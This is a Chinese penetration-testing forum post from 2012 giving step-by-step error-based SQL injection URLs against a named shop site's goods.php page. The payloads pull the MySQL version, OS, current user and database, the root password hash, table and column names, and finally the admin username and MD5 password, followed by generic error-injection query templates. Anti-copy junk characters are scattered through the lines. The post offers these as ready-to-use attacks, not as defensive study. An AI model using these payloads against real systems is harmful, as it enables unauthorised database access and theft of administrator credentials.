找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2058|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ) F+ Y" g* b# J+ o
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 e3 e& V% r- w
3 C, Z" _6 E# u( K1 y* y
判断系统
8 S( W# o- S$ u  X8 b  X
- d# t9 M3 g1 [8 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( C# N( @2 x! h' u
+ _7 I3 I8 C& O; r5 n, M* R
# ?" O. g& P7 l" w
" D5 w* r) O: X; h- E; O% h* a# i当前 user()9 m# ~& t1 x' c8 Z

8 ~6 N) M# ^$ V8 K$ @; o! D& mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 p0 V  O- n# X! o* M% v

% [9 v8 b! k2 Z6 t; M* m  I
; r3 v+ t# h: g9 Y3 {" C) m3 W3 a$ _( v- B4 a% {) T
当前 database()
% [/ p( p& a; _5 j' dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. s$ R& V# o4 w/ V0 B3 V' d* @
) k' g8 J1 y" I. \1 m& f. H

8 T/ @3 b, {2 @5 z, o7 S
% a# W& x: e, s# o6 I: d7 U$ @& l( T' }0 Q( k2 M
root hash" R' R6 ?$ o/ o" H" G5 u7 ~- p
7 a0 J2 G2 C# n# v. D0 _1 Q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 X9 \5 G% O! ?3 ~& v6 u9 J: x- C9 v- m! o2 A
0 M* |) P" f5 n+ ]$ K

1 H! S7 D, X5 h) N5 ?7 g# R4 |当前 数据库表名
. W/ w4 D- G" y; |/ s" }
* P. y4 E1 T! g' E6 uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 G" t1 H: Y8 R3 r  f# g

/ ^4 y9 w) e3 k/ u% o! c$ _) T6 |1 j8 F% \4 a

% I3 r6 c8 ]3 r2 Z$ u; q6 f  w当前 数据库 user_name 字段2 Y* O  U9 J' c" S4 Z1 m
/ ]" e6 N7 l8 X. d1 s/ m/ K6 K% i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 h% o: N- C: |- ~8 q
5 n5 J' r% x* s1 _4 b* U$ E7 q) D当前 数据库 字段 password
# m6 ^( x2 X7 H4 ?: _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* ]* _5 k, b: U# I/ j

( r5 Y, B! Z: p/ h
% T! H# t, c7 H- V( g% b0 @; p1 Q5 Z# J0 B
获得 admin passwd(md5)9 v. i  X8 d, {# k# k9 {
- g# ]* c5 r) F8 e$ D8 K# ]% n

- R$ ?. H0 U1 o9 ~" h7 ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 @: V- M# C* |7 ?6 U6 W

+ C# H7 ^3 a; g7 \7 E2 Y报错注射
7 N9 B. Q' z8 L" W: }SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
  d, \' G8 l8 k2 ]4 ?2 a+ Z! r" i3 X2 _, v$ T
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a), h  }( g% s1 Q2 m% E8 l
8 T/ o1 u9 t2 s
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表